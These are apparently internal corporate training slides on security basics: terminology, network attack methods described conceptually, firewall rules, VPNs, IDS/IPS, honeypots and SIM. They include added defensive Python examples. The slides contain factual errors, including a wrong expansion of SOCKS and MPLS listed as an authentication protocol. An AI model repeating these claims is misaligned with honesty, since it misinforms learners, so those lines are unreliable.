Basics of Security and Attack
© 2009 Wipro Ltd – Internal & Restricted
Agenda
1 Definitions of Security Terms
2 Security Technologies
3 VA, PT, VM & Compliances
4 Security Attacks
5 Software Exploits
1. Definitions of Security Terms
When > Where > How
Definitions
• Protected Resources / Asset: things to protect
• Entry/Exit Points: ways to get at an asset
• Threat: risks to an asset
  – Attack / exploit: an action taken that harms an asset
  – Vulnerability: a hole or weakness in the system, which can be a design flaw, an implementation bug, etc., that allows an attacker to cause harm to the stakeholders of the system. Stakeholders include the application owner, administrators, users, and other entities that rely on the system.
• Risk: likelihood that a vulnerability could be exploited
• Mitigation / Countermeasure: something that addresses a specific vulnerability
Terminology Example
• Asset(s):
  – $5,000,000 under the mattress in the guest bedroom
• Threat(s):
  – Losing the $5,000,000
• Entry/Exit Points:
  – Front & side doors
  – Windows (guest bedroom & elsewhere in the residence)
• Note that a vulnerability can be shared across attacks (!)

Threat                | Attack                             | Vulnerability                                  | Risk (0-100)
Losing the $5,000,000 | Burglar breaks in and steals money | Plate glass windows                            | 95
                      |                                    | Windows can be lifted out of frame             | 85
                      |                                    | No dead bolt on doors / doors can be kicked in | 75
                      |                                    | No alarm system                                | 100
                      | House burns down                   | No alarm system                                | 100
Hacker
The term "Hacker" may mean simply a person with mastery of computers; however, the mass media most often uses "Hacker" as synonymous with a (usually criminal) computer intruder.
In a security context, a hacker is someone involved in computer security/insecurity, specializing in the discovery of exploits in systems (for exploitation or prevention), or in obtaining or preventing unauthorized access to systems through skills, tactics and detailed knowledge.
Types of Hackers
• White hat - Someone who breaks security but does so for altruistic or at least non-malicious reasons. They generally have a clearly defined code of ethics, and will often attempt to work with a manufacturer or owner to address discovered security weaknesses.
• Grey hat - A hacker of ambiguous ethics and/or borderline legality, often frankly admitted.
• Bluehat - Someone outside computer security consulting firms who is used to bug-test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term Bluehat to represent a series of security briefing events.
• Black hat - Someone who subverts computer security without authorization or who uses technology (usually a computer or the Internet) for terrorism, vandalism, credit card fraud, identity theft, intellectual property theft, or many other types of crime. This can mean taking control of a remote computer through a network, or software cracking.
• Script kiddie - A pejorative term for a computer intruder with little or no skill; a person who simply follows directions or uses a cook-book approach without fully understanding the meaning of the steps they are performing.
• Hacktivist - A hacker who utilizes technology to announce a political message. Web vandalism is not necessarily hacktivism.
Types of Attacks
• Criminal attacks
  – Basis is financial gain
  – Includes fraud, destruction and theft (personal, brand, identity)
• Privacy violations
  – Private/personal information acquired by organizations not authorized to hold it
  – Includes surveillance, databases, traffic analysis
• Publicity attacks
  – Attacker wants to get their name(s) in the papers
  – Can affect ANY system, not just those related to profit centers
  – Denial of service
• Legal attack
  – Set up a situation to use the discovery process to gather information
  – Rare, but possibly devastating
Methods of Attacking the Network
• Password sniffing
  – Collect the first parts of data packets and look for login attempts
• IP spoofing
  – Fake packets to “hijack” a session and gain access
• DNS overrides
  – Malicious access to a DNS server can compromise a network
• Denial of service attacks – single and distributed
  – Large number of “SYN” packets to establish dummy connections
    • System gets throttled handling all the “hello” requests
  – Massive number of e-mail messages will flood a system
Methods of Attacking the Network (Contd.)
• Port scanning
  – Automated process that looks for open networking ports
  – Logs positive hits for later exploits
• Buffer overrun packets
  – Attacker sends a carefully built packet to computers on the network that support specific services (e-mail, IIS)
  – Packet causes the accepting process to abort, leaving the system in an unknown state, potentially with root access
  – Packet contains code that executes to get root access
Methods of Defending a Network
• Firewalls
  – Networking devices (routers) that check traffic coming into a private network
  – Need to be complete and properly configured to ensure protection
  – Good protection for general networking traffic, but specific traffic will still get through
• DMZs
  – Network space between two firewalls
• VPNs
  – Provide encrypted access from outside a network
  – Current versions aren’t reliable enough and aren’t useful against “slow” attacks
Methods of Defending a Network (Contd.)
• Burglar alarms
  – Traps set on specific networked objects that go off if accessed
• Honey pots
  – Dummy objects used to attract attacks; range from single devices to whole subnetworks
• Vulnerability scanners
  – Tools that scan a network periodically for holes / open gateways / misconfigured routers
  – Limited in scope because of potential damage to the network
• Cryptography
  – Has potential, but complexity limits its use to local sites
Wrap Up
• Continue to monitor and evolve
  – Follow CERT bulletins and evaluate them against your systems
  – Network with industry acquaintances to learn of possibly new styles of attack
  – Try to be proactive
  – Formalize a security strategy:
    • WHO is accessing your data?
    • WHAT are the key resource(s) you need to protect?
    • WHEN is data access expected?
    • WHERE are the users who are accessing your data?
2. Security Technologies
Firewalls
• A firewall is a dedicated appliance, or software running on another computer, which inspects network traffic passing through it and denies or permits passage based on a set of rules.
• Firewalls make it possible to filter incoming and outgoing traffic that flows through your system.
• A firewall can use one or more sets of “rules” to inspect network packets as they come in or go out of your network connections and either allow the traffic through or block it.
• The rules of a firewall can inspect one or more characteristics of the packets, including but not limited to the protocol type, the source or destination host address and the source or destination port.
General Firewall Techniques
• Service control
  – Type of service: inbound or outbound
  – Traffic filtering based on IP address & TCP port number
  – Provides proxy software to receive or interpret a service request before passing it on
  – Could also host server software (e.g. Web or mail service)
    • Not recommended: complicates the firewall (more code => more vulnerabilities)
• User control
  – Control access to services using ACLs
• Behavior control
  – E.g. filter e-mail for spam
Firewall Characteristics
• All traffic (incoming / outgoing) must pass through the firewall
• Only authorized traffic is allowed to pass
• The firewall itself must be immune to penetration
  – i.e. it must use a trusted system with a secure OS (minimum size/complexity)
  – Usually implemented on a dedicated device
    • Dedicated = only firewall functions are performed on this device
  – Firewall code must be very well protected
Firewall Types
• Basic kinds of firewalls:
  – Hardware firewalls
    • More common
    • Implemented at the router level
    • More expensive / more difficult to configure
  – Software firewalls
    • Used on single workstations
    • Less expensive / easier to configure
Evolution of Firewalls
[Diagram: stages of evolution] Packet Filter → Stateful Inspection → Application Proxy → Deep Packet Inspection
Network Address Translation (NAT)
• NAT is a technology that hides the private network.
• It allows a single device to act as an intermediary between the Internet and a local network. This effectively means that a single IP address can be used for an entire group of computers.
• Converts private addresses to legally registered public IP addresses.
• NAT is commonly supported by WAN access routers and firewalls.
Challenges faced
• Lots of vulnerabilities on hosts in the network
• Users don’t keep systems up to date
  – Lots of patches
  – Lots of exploits in the wild (no patch for them)
• Solution?
  – Limit access to the network
    • Don’t trust outsiders
    • Trust insiders (!!!)
  – Put firewalls across the perimeter of the network
Firewalls (Contd.)
• Firewall inspects traffic through it
• Has a pre-defined policy
• Allows traffic specified in the policy
• Drops everything else
• Two types
  – Packet filters, proxies
[Diagram: Internet – Firewall – Internal Network]
Packet Filters
• A packet filter selectively passes packets from one network interface to another
• Usually done within a router between external and internal networks
  – Screening router
• Can be done by a dedicated network element
  – Packet filtering bridge
  – Harder to detect and attack than screening routers
• Example filters
  – Block all packets from outside except for SMTP servers
  – Block all traffic to a list of domains
  – Block all connections from a specified domain
Packet Filters (Contd.)
• Data available
  – IP source and destination addresses
  – Transport protocol (TCP, UDP, or ICMP)
  – TCP/UDP source and destination ports
  – ICMP message type
  – Packet options (fragment size etc.)
• Actions available
  – Allow the packet to go through
  – Drop the packet (notify sender / drop silently)
  – Alter the packet (NAT?)
  – Log information about the packet
Typical Firewall Configuration
[Diagram: Internet, Intranet and DMZ connected through the firewall; the blocked paths are marked X]
• Internal hosts can access the DMZ and the Internet
• External hosts can access the DMZ only, not the Intranet
• DMZ hosts can access the Internet only
• Advantages?
  – If a service gets compromised in the DMZ it cannot affect internal hosts
Example Firewall Rules
• Stateless packet filtering firewall
• Rule → (Condition, Action)
• Rules are processed in top-down order
  – If a condition is satisfied for a packet, the action is taken
  – All rules checked
Sample Firewall Rule

Rule  | Dir | Src Addr | Src Port | Dst Addr | Dst Port | Proto | Ack Set? | Action
SSH-1 | In  | Ext      | > 1023   | Int      | 22       | TCP   | Any      | Allow
SSH-2 | Out | Int      | 22       | Ext      | > 1023   | TCP   | Yes      | Allow

• Allow SSH from external hosts to internal hosts
  – Two rules
    • Inbound and outbound
  – How to know a packet is for SSH?
    • Inbound: src-port > 1023, dst-port = 22
    • Outbound: src-port = 22, dst-port > 1023
    • Protocol = TCP
  – Ack Set?
  – Problems?
[Diagram: TCP three-way handshake between Client and Server: SYN → SYN/ACK → ACK]
Default Firewall Rules
• Egress filtering
  – Outbound traffic from an external address → Drop
  – Benefits?
• Ingress filtering
  – Inbound traffic from an internal address → Drop
  – Benefits?
• Default deny
  – Why?

Rule    | Dir | Src Addr | Src Port | Dst Addr | Dst Port | Proto | Ack Set? | Action
Ingress | In  | Int      | Any      | Int      | Any      | Any   | Any      | Deny
Egress  | Out | Ext      | Any      | Ext      | Any      | Any   | Any      | Deny
Default | Any | Any      | Any      | Any      | Any      | Any   | Any      | Deny
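As an added illustration that is not part of the original slides, the following Python evaluates the SSH-1/SSH-2 rules together with the Ingress/Egress/Default rules top-down, first match wins, and shows both why the “Ack Set?” column matters and where a stateless filter falls short. The 10.0.0.0/8 “internal” range and the sample packets are constructed.

```python
"""Stateless packet filter implementing the slide's rule table.

Rules are evaluated top-down; the first matching rule decides. The anti-spoofing
rules (Ingress/Egress) come first, then the SSH pair, then the catch-all Default
Deny. Added example; INTERNAL and the sample packets are constructed."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Tuple

INTERNAL = ip_network("10.0.0.0/8")   # constructed: what the filter treats as "Int"


@dataclass(frozen=True)
class Packet:
    direction: str     # "In" (arriving from outside) or "Out"
    src: str
    sport: int
    dst: str
    dport: int
    proto: str         # "TCP", "UDP" or "ICMP"
    ack: bool = False  # TCP ACK flag


@dataclass(frozen=True)
class Rule:
    name: str
    direction: str     # "In", "Out" or "Any"
    src_addr: str      # "Int", "Ext" or "Any"
    src_port: str      # "Any", "22" or "> 1023"
    dst_addr: str
    dst_port: str
    proto: str         # "TCP" or "Any"
    ack_set: str       # "Yes", "No" or "Any"
    action: str        # "Allow" or "Deny"


def _addr_class(ip: str) -> str:
    return "Int" if ip_address(ip) in INTERNAL else "Ext"


def _port_matches(spec: str, port: int) -> bool:
    if spec == "Any":
        return True
    if spec.startswith(">"):
        return port > int(spec[1:])
    return port == int(spec)


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    return (rule.direction in ("Any", pkt.direction)
            and rule.src_addr in ("Any", _addr_class(pkt.src))
            and rule.dst_addr in ("Any", _addr_class(pkt.dst))
            and _port_matches(rule.src_port, pkt.sport)
            and _port_matches(rule.dst_port, pkt.dport)
            and rule.proto in ("Any", pkt.proto)
            and (rule.ack_set == "Any" or (rule.ack_set == "Yes") == pkt.ack))


# Rule table exactly as on the slides; order matters.
RULES: List[Rule] = [
    Rule("Ingress", "In",  "Int", "Any",    "Int", "Any",    "Any", "Any", "Deny"),
    Rule("Egress",  "Out", "Ext", "Any",    "Ext", "Any",    "Any", "Any", "Deny"),
    Rule("SSH-1",   "In",  "Ext", "> 1023", "Int", "22",     "TCP", "Any", "Allow"),
    Rule("SSH-2",   "Out", "Int", "22",     "Ext", "> 1023", "TCP", "Yes", "Allow"),
    Rule("Default", "Any", "Any", "Any",    "Any", "Any",    "Any", "Any", "Deny"),
]


def filter_packet(pkt: Packet, rules: List[Rule] = RULES) -> Tuple[str, str]:
    """Return (action, name of the first matching rule)."""
    for rule in rules:
        if rule_matches(rule, pkt):
            return rule.action, rule.name
    return "Deny", "implicit"   # unreachable while Default is the last rule


if __name__ == "__main__":
    # Constructed packets: a legitimate SSH handshake plus packets the filter should drop,
    # and one ACK-only probe that a stateless filter cannot tell from an established session.
    cases = {
        "client SYN to internal SSH":        Packet("In",  "203.0.113.5", 40000, "10.0.0.7", 22, "TCP"),
        "server SYN/ACK back to client":     Packet("Out", "10.0.0.7", 22, "203.0.113.5", 40000, "TCP", ack=True),
        "spoofed internal src from outside": Packet("In",  "10.0.0.9", 40000, "10.0.0.7", 22, "TCP"),
        "inbound to port 80":                Packet("In",  "203.0.113.5", 40000, "10.0.0.7", 80, "TCP"),
        "ACK probe to port 22 (no session)": Packet("In",  "203.0.113.5", 40000, "10.0.0.7", 22, "TCP", ack=True),
    }
    for label, pkt in cases.items():
        print(f"{label:36s} -> {filter_packet(pkt)}")
```

The last case is the answer to the slide’s “Problems?”: without connection state the filter must allow any inbound TCP segment to port 22, which is what a stateful filter fixes.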
Packet Filters
• Advantages
  – Transparent to application/user
  – Simple packet filters can be efficient
• Disadvantages
  – Usually fail open
  – Very hard to configure the rules
  – Doesn’t have enough information to take actions
    • Does port 22 always mean SSH?
    • Who is the user accessing SSH?
• What is the fix?
Alternatives
• Stateful packet filters
  – Keep the connection states
  – Easier to specify rules – at connection level
  – More popular
  – Problems?
    • State explosion
    • State for UDP/ICMP?
Alternatives (Contd.)
• Proxy firewalls
  – Two connections instead of one
  – Either at transport level
    • SOCKS proxy
  – Or at application level
    • HTTP proxy
• Requires applications (or dynamically linked libraries) to be modified to use the proxy
Proxy Firewall
• Data available
  – Application level information
  – User information
• Advantages:
  – Better policy enforcement
  – Better logging
  – Fail closed
• Disadvantages:
  – Doesn’t perform as well
  – One proxy for each application
  – Client modification
What is VPN?
• A VPN is a means of carrying private traffic over a public network.
• Often used to connect two private networks, over a public network, to form a virtual network.
• The word virtual means that, to the users on either end, the two private networks seem to be seamlessly connected to each other.
• That is, they are part of a single virtual private network (although physically they are two separate networks).
  → Implication? Connectivity, security, privacy. The VPN should provide the same connectivity and privacy you would find on a typical local private network.
Different Types of VPNs
• Based on encryption:
  – Encrypted VPNs
  – Non-encrypted VPNs
• Based on the OSI model:
  – Data link layer VPNs
  – Network layer VPNs
  – Application layer VPNs
• Based on business functionality:
  – Intranet VPNs
  – Extranet VPNs
Brief Overview of How it Works
• Two connections – one is made to the Internet and the second is made to the VPN.
• Datagrams – contain data, destination and source information.
• Firewalls – VPNs allow authorized users to pass through the firewalls.
• Protocols – protocols create the VPN tunnels.
2 main VPN architectures:
• There are products based on IPSec and on Point to Point Tunneling Protocol (PPTP) or L2TP (Layer 2 Tunneling Protocol).
• Although IPSec has become the de facto standard for LAN-to-LAN VPNs, PPTP and L2TP are heavily used for single-client-to-LAN connections.
• Therefore, many VPN products support IPSec, PPTP and L2TP.
Technologies
Tunneling
A virtual point-to-point connection made through a public network. It transports encapsulated datagrams.
[Diagram: Data Encapsulation (from Comer) – the original datagram is encrypted and becomes the inner datagram; the outer datagram consists of a datagram header and a data area carrying the encrypted inner datagram]
Two types of end points:
• Remote access
• Site-to-site
VPN Encapsulation of Packets
IPSec uses two Basic Security Protocols
• Authentication Header (AH): the authenticating protocol
• Encapsulating Security Payload (ESP): an authenticating and encrypting protocol that provides source authentication, confidentiality, and message integrity.
SSL Architecture
Authentication Protocols
• Password Authentication Protocol (PAP)
• Challenge Handshake Authentication Protocol (CHAP)
• Extensible Authentication Protocol (EAP)
• MPLS – Multi Protocol Label Switching
• Terminal Access Controller Access-Control System (TACACS)
• Remote Authentication Dial In User Service (RADIUS)
• Secured Over Credential-based Kerberos Services - SOCKS
VPN Comparisons
IDS Definition
It is better to prevent an attack than to detect it after it succeeds. Unfortunately, not all attacks can be prevented.
Some attackers become intruders — they succeed in breaking defenses.
Intrusion Prevention — first line of defense
Intrusion Detection — second line of defense
Intrusion Detection System (IDS) - a device (typically a separate computer) monitoring system activities to detect malicious / suspicious events like attacks.
• IDS runs constantly in the background - it alarms when it detects something suspicious.
• IDS should operate in stealth mode - be invisible to the outside world.
• IDSs attempt to detect
  • Outsiders breaking into a system, OR
  • Insiders (legitimate users) performing illegitimate actions, accidentally or deliberately
IDS Terminology
• Anomaly — abnormal behavior
• Misuse — activity that violates the security policy (subset of “anomaly”)
• Intrusion — misuse by outsiders and insiders
• Audit — activity of looking at user/system behavior, its effects, or collected data
• Profiling — looking at users or systems to determine ‘what they usually do’
Types of IDS
• Host-based IDS (HIDS)
  – Runs on a host
  – Monitors activities on this host only
• Network-based IDS (NIDS)
  – Stand-alone device
  – Monitors an entire (sub)network
Hybrid types with respect to operation:
  i. Signature-based IDSs
  ii. Anomaly-based IDSs (heuristic IDSs)
    (a) Misuse intrusion detection
  iii. Other IDS types
Host-based IDS
• Program on one specific host
• Analyses activity on that host
  – System calls
  – File-system modifications
  – Memory integrity
• Vulnerable to attacks, since they are part of the monitored system
• No protection against DoS attacks
Network-based IDS
• Analyze network traffic by inspecting packets
  – Easy in non-switched networks
  – Switched networks: network tap or port mirroring
  – Only monitor traffic in specific segments (e.g. traffic via the gateway)
• Can become bottlenecks in high-speed networks
• Cannot analyze encrypted packets
Signature Recognition
• Mostly for NIDS
• Match ongoing activities against known patterns (“signatures”)
• Pre-processing may be necessary (e.g. reassemble fragmented packets)
• Analyze packet headers: port scans, SYN floods, …
• Analyze payload: malicious code, …
Anomaly Detection
• Create patterns for normal user activity
• Detect deviations from these patterns
  – E.g. a secretary uses a browser, e-mail client and text processor between 08.00 and 16.00; using nmap and gcc at 23.00 is abnormal
• Neural nets could be used
• Problem: analysing users’ behavior means their privacy is compromised
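To make the secretary example concrete, here is an added profile-based anomaly detector that is not part of the original slides: it learns which programs each user runs and at which hours from a clean history, then reports every deviation. The training history, the observed events and the user/program names are constructed; the legitimate overtime event shows the false-positive problem the later “Limits of IDS” slide mentions.

```python
"""Profile-based anomaly detection on (user, program, hour) events.

Added example. HISTORY is a constructed "normal" period for the secretary from the
slide (office tools, 08:00-16:00); anything outside the learned profile is flagged."""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

Event = Tuple[str, str, int]   # (user, program, hour of day 0-23)


class BehaviourProfile:
    """Per-user profile of programs used and hours active, learned from clean history."""

    def __init__(self) -> None:
        self.programs: Dict[str, Set[str]] = defaultdict(set)
        self.hours: Dict[str, Set[int]] = defaultdict(set)

    def train(self, history: Iterable[Event]) -> None:
        for user, program, hour in history:
            self.programs[user].add(program)
            self.hours[user].add(hour)

    def score(self, event: Event) -> List[str]:
        """Return the list of deviations for one event; an empty list means 'normal'."""
        user, program, hour = event
        if user not in self.programs:
            return ["unknown user"]
        reasons: List[str] = []
        if program not in self.programs[user]:
            reasons.append(f"program {program} never seen for {user}")
        if hour not in self.hours[user]:
            reasons.append(f"activity at {hour:02d}:00 outside usual hours")
        return reasons


def detect(profile: BehaviourProfile,
           events: Iterable[Event]) -> List[Tuple[Event, List[str]]]:
    """Return only the anomalous events, each paired with its reasons."""
    flagged: List[Tuple[Event, List[str]]] = []
    for event in events:
        reasons = profile.score(event)
        if reasons:
            flagged.append((event, reasons))
    return flagged


# Constructed training history: office tools used every hour from 08:00 to 16:00.
HISTORY: List[Event] = [("secretary", program, hour)
                        for hour in range(8, 17)
                        for program in ("browser", "email-client", "text-processor")]


def demo() -> List[Tuple[Event, List[str]]]:
    profile = BehaviourProfile()
    profile.train(HISTORY)
    observed: List[Event] = [                 # constructed events to score
        ("secretary", "email-client", 10),    # normal
        ("secretary", "nmap", 23),            # wrong tool and wrong hour (slide's example)
        ("secretary", "gcc", 23),
        ("secretary", "browser", 12),         # normal
        ("secretary", "text-processor", 17),  # legitimate overtime: a false positive
    ]
    return detect(profile, observed)


if __name__ == "__main__":
    for event, reasons in demo():
        print(event, "->", "; ".join(reasons))
```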
Limits of IDS
• Attackers use avoidance strategies to avoid detection by IDS
• IDS sensitivity is difficult to measure and adjust
• Must strike a balance between false alarms and missed attacks
• Only as good as the process/people using it
• HIDS are vulnerable to attacks since they run on the monitored machine
• NIDS can become bottlenecks in high-speed networks
• NIDS cannot deal with encrypted connections
• Only “known” attacks can be detected
• Heuristics and neural nets can produce false positives
IPS
• Intrusion prevention system – a computer security device that monitors network and/or system activities for malicious or unwanted behavior and can react, in real time, to block or prevent those activities. A network-based IPS, for example, will operate in-line to monitor all network traffic for malicious code or attacks. When an attack is detected, it can drop the offending packets while still allowing all other traffic to pass. Intrusion prevention technology is considered by some to be an extension of intrusion detection (IDS) technology. The term "Intrusion Prevention System" was coined by Andrew Plato.
• Host based
• Network based
  – Content based
  – Protocol analysis
  – Rate based
Host Based IPS
• A host-based IPS (HIPS) is one where the intrusion-prevention application is resident on that specific IP address, usually on a single computer.
• As with host IDS systems, the host IPS relies on agents installed directly on the system being protected. It binds closely with the operating system kernel and services, monitoring and intercepting system calls to the kernel or APIs in order to prevent attacks as well as log them.
• It may also monitor data streams and the environment specific to a particular application (file locations and Registry settings for a Web server, for example) in order to protect that application from generic attacks for which no “signature” yet exists.
• Since a host IPS agent intercepts all requests to the system it protects, it has certain prerequisites - it must be very reliable, must not negatively impact performance, and must not block legitimate traffic.
Network Based IPS (NIPS)
• A network-based IPS is one where the IPS application/hardware and any actions taken to prevent an intrusion on specific network host(s) are done from a host with another IP address on the network (this could be a front-end firewall appliance).
• Network intrusion prevention systems (NIPS) are purpose-built hardware/software platforms that are designed to analyze, detect, and report on security-related events. NIPS are designed to inspect traffic and, based on their configuration or security policy, they can drop malicious traffic.
Content Based IPS
• A content-based IPS (CBIPS) inspects the content of network packets for unique sequences, called signatures, to detect and hopefully prevent known types of attack such as worm infections and hacks.
Protocol Analysis
• Protocol analyzers can natively decode application-layer network protocols, like HTTP or FTP. Once the protocols are fully decoded, the IPS analysis engine can evaluate different parts of the protocol for anomalous behavior or exploits.
• For example, the existence of a large binary file in the User-Agent field of an HTTP request would be very unusual and likely an intrusion. A protocol analyzer could detect this anomalous behavior and instruct the IPS engine to drop the offending packets.
• Since many vulnerabilities have dozens or even hundreds of exploit variants, pattern-recognition-based IPS/IDS engines can be evaded. For example, some pattern recognition engines require hundreds of different signatures (or patterns) to protect against a single vulnerability.
• This is because they must have a different pattern for each exploit variant. Protocol-analysis-based products can often block exploits with a single signature that monitors for the specific vulnerability in the network communications.
Rate Based IPS
• Rate-based IPS (RBIPS) are primarily intended to prevent Denial of Service and Distributed Denial of Service attacks. They work by monitoring and learning normal network behaviors.
• Through real-time traffic monitoring and comparison with stored statistics, RBIPS can identify abnormal rates for certain types of traffic, e.g. TCP, UDP or ARP packets, connections per second, packets per connection, packets to specific ports etc. Attacks are detected when thresholds are exceeded. The thresholds are dynamically adjusted based on time of day, day of the week etc., drawing on stored traffic statistics.
• Unusual but legitimate network traffic patterns may create false alarms. The system's effectiveness is related to the granularity of the RBIPS rulebase and the quality of the stored statistics.
• Once an attack is detected, various prevention techniques may be used such as rate-limiting specific attack-related traffic types, source or connection tracking, and source-address, port or protocol filtering (black-listing) or validation (white-listing).
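The following Python, added here and not taken from the slides, shows the rate-based mechanism just described: per-hour thresholds are derived from stored connections-per-second statistics, live samples above the threshold for their hour are flagged, and the offending rate is clamped as the rate-limiting response. The baseline statistics, the sample rates and the addresses are all constructed; the night-time backup sample shows the false alarm the slide warns about.

```python
"""Rate-based detection with time-of-day thresholds.

Added example. BASELINE stands in for the "stored statistics" on the slide: past
new-connections-per-second measurements grouped by hour of day. SAMPLES are
constructed live measurements of (hour, source address, connections per second)."""
from statistics import mean, pstdev
from typing import Dict, List, Tuple

Sample = Tuple[int, str, float]

# Constructed stored statistics: a quiet night hour and a busy office hour.
BASELINE: Dict[int, List[float]] = {
    3:  [2, 3, 2, 4, 3, 2, 3, 3],
    10: [40, 45, 42, 50, 38, 44, 47, 41],
}

# Constructed live samples.
SAMPLES: List[Sample] = [
    (3,  "198.51.100.7",  30.0),   # burst at night: far above the 03:00 baseline
    (3,  "10.0.0.5",       4.0),   # normal night traffic
    (3,  "10.0.0.40",     12.0),   # nightly backup job: legitimate, yet flagged (false alarm)
    (10, "10.0.0.5",      55.0),   # busy, but within the 10:00 baseline
    (10, "203.0.113.9",  120.0),   # flood during office hours
]


def thresholds(baseline: Dict[int, List[float]], k: float = 4.0) -> Dict[int, float]:
    """Per-hour threshold = mean + k * population std-dev of the stored rates,
    so the same absolute rate can be normal at 10:00 and abnormal at 03:00."""
    return {hour: mean(rates) + k * pstdev(rates) for hour, rates in baseline.items()}


def detect(samples: List[Sample], th: Dict[int, float]) -> List[Sample]:
    """Return the samples whose rate exceeds the threshold for their hour."""
    return [(hour, src, rate) for hour, src, rate in samples if rate > th[hour]]


def rate_limit(rate: float, threshold: float) -> float:
    """Prevention step: clamp the offending source to the hour's threshold rate."""
    return min(rate, threshold)


def run() -> List[Sample]:
    return detect(SAMPLES, thresholds(BASELINE))


if __name__ == "__main__":
    th = thresholds(BASELINE)
    for hour, limit in sorted(th.items()):
        print(f"{hour:02d}:00 threshold = {limit:.1f} conn/s")
    for hour, src, rate in run():
        print(f"{hour:02d}:00 {src:14s} {rate:6.1f} conn/s exceeds threshold, "
              f"limited to {rate_limit(rate, th[hour]):.1f}")
```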
Host based VS Network based IPS
• HIPS can handle encrypted and unencrypted traffic equally, because it can analyze the data after it has been decrypted on the host.
• NIPS does not use processor and memory on computer hosts but uses its own CPU and memory.
• NIPS is a single point of failure, which is considered a disadvantage; however, this property also makes it simpler to maintain. This attribute applies to all network devices like routers and switches and can be overcome by implementing the network accordingly (failover path, etc.).
• A bypass switch can be implemented to alleviate the single-point-of-failure disadvantage. This also allows the NIPS appliance to be moved and taken off-line for maintenance when needed.
• NIPS can detect events scattered over the network (e.g. a low-level event targeting many different hosts, like a host scan or a worm) and can react, whereas with a HIPS only the host's own data is available to take a decision, or it would take too much time to report it to a central decision-making engine and report back to block.
Honeypot
• Trap to attract attacks
• Assign unused address space to one (dummy) host (“honeypot”)
• Simulate services or proxy servers
• Legitimate users never communicate with the honeypot
• Automated attacks (e.g. worms) cannot distinguish the honeypot from a normal host
• All activity can be logged for evidence
• New attacks can be analyzed. E.g.:
  – Simulate an open SMTP relay
  – Drop all incoming mail without looking at it
  – Spammers can be identified
  – Legal measures possible
  – Spam is destroyed efficiently
Security Information Management (SIM)
• SIM is the industry-specific term in computer security referring to the collection of data (typically log files, e.g. event logs) into a central repository for trend analysis.
• SIM is a solution which allows automated integration of log analysis, event correlation, and reporting of critical security event information to enable organizations to immediately identify and respond to various threats.
• There are four major components of a SIM: client components, a correlation engine, a signature database and a management console.
SIM
[Diagram: events from many sources are consolidated into the SIM, which provides traceability, meta-alerting and reporting]
Need for SIM
The best way to increase the effectiveness of an organization's information security architecture is through better analysis, and an increasingly popular analysis technique is event correlation. Unfortunately, conducting correlation without using security event management software is nearly impossible because of these issues:
• Event data is logged in a variety of proprietary formats, making comparison difficult.
• Event data is stored in multiple information ‘silos’, i.e. proprietary consoles, syslogs etc.
• Manually comparing event data from across the enterprise to find similarities is time consuming, if not impossible.
• No manual method exists that enables correlation to be conducted in real time.
• Constantly evolving threats necessitate continuously adding, modifying and enhancing correlation techniques.
Aggregation and Correlation
• Aggregation is the process by which the events collected from various devices are normalized and indexed.
• The correlation engine then analyses and validates the event logs sent by the log collector components, based on rules or statistics stored in the database.
• Once an event is validated it is passed on to the management console, where security professionals can view the alerts in one single console.
• Security professionals can view and monitor events related to various devices or servers in one single format and in one single console.
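As an added example (not from the slides or any SIM product), the Python below walks through the aggregation and correlation steps just described and the “proprietary formats” problem from the “Need for SIM” slide: two constructed log formats are normalized into one schema, indexed by time, and a rule-based correlation fires when one account fails authentication on several devices within a short window. The log formats, host names, user names and addresses are all constructed.

```python
"""SIM-style aggregation (normalize + index) and rule-based correlation.

Added example. HOST_RE and FW_RE describe two constructed "proprietary" log
formats (a Unix sshd line and a firewall key=value line); SAMPLE_LOGS are
constructed lines in those formats."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

Event = Dict[str, object]

HOST_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: Failed password for "
                     r"(?P<user>\S+) from (?P<src>\S+)")
FW_RE = re.compile(r"^ts=(?P<ts>\S+) dev=(?P<host>\S+) event=vpn-auth-fail "
                   r"user=(?P<user>\S+) src=(?P<src>\S+)")

SAMPLE_LOGS: List[str] = [   # constructed; note the out-of-order third and fourth lines
    "2024-01-15T09:00:01 web01 sshd[4021]: Failed password for alice from 198.51.100.7 port 51022 ssh2",
    "ts=2024-01-15T09:00:40 dev=fw-edge event=vpn-auth-fail user=alice src=198.51.100.7",
    "2024-01-15T09:01:55 web01 sshd[4022]: Accepted publickey for bob from 10.0.0.5 port 4000 ssh2",
    "2024-01-15T09:01:10 db01 sshd[880]: Failed password for alice from 198.51.100.7 port 51030 ssh2",
    "2024-01-15T11:30:00 web01 sshd[4100]: Failed password for bob from 10.0.0.9 port 4100 ssh2",
]


def normalize(line: str) -> Optional[Event]:
    """Aggregation step 1: map a raw line onto the common schema, or None if unknown."""
    for regex, device_type in ((HOST_RE, "unix-host"), (FW_RE, "firewall")):
        m = regex.match(line)
        if m:
            return {"time": datetime.fromisoformat(m["ts"]), "host": m["host"],
                    "device_type": device_type, "category": "auth-failure",
                    "user": m["user"], "src": m["src"]}
    return None


def aggregate(lines: List[str]) -> List[Event]:
    """Aggregation step 2: normalize every line and index the result by time."""
    events = [e for e in (normalize(line) for line in lines) if e is not None]
    return sorted(events, key=lambda e: e["time"])


def correlate(events: List[Event], threshold: int = 3,
              window: timedelta = timedelta(minutes=5)) -> List[Event]:
    """Rule: at least `threshold` auth failures for one user on at least two distinct
    devices within `window` raise one alert for that burst."""
    by_user: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        if e["category"] == "auth-failure":
            by_user[str(e["user"])].append(e)
    alerts: List[Event] = []
    for user, evs in by_user.items():
        for i, first in enumerate(evs):
            burst = [x for x in evs[i:] if x["time"] - first["time"] <= window]
            hosts = sorted({str(x["host"]) for x in burst})
            if len(burst) >= threshold and len(hosts) >= 2:
                alerts.append({"user": user, "count": len(burst), "hosts": hosts,
                               "src": sorted({str(x["src"]) for x in burst}),
                               "first": first["time"]})
                break   # one alert per user per burst
    return alerts


def run() -> List[Event]:
    return correlate(aggregate(SAMPLE_LOGS))


if __name__ == "__main__":
    for alert in run():
        print(alert)
```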
SIM Architecture - Aggregation
SIM Architecture – Correlation
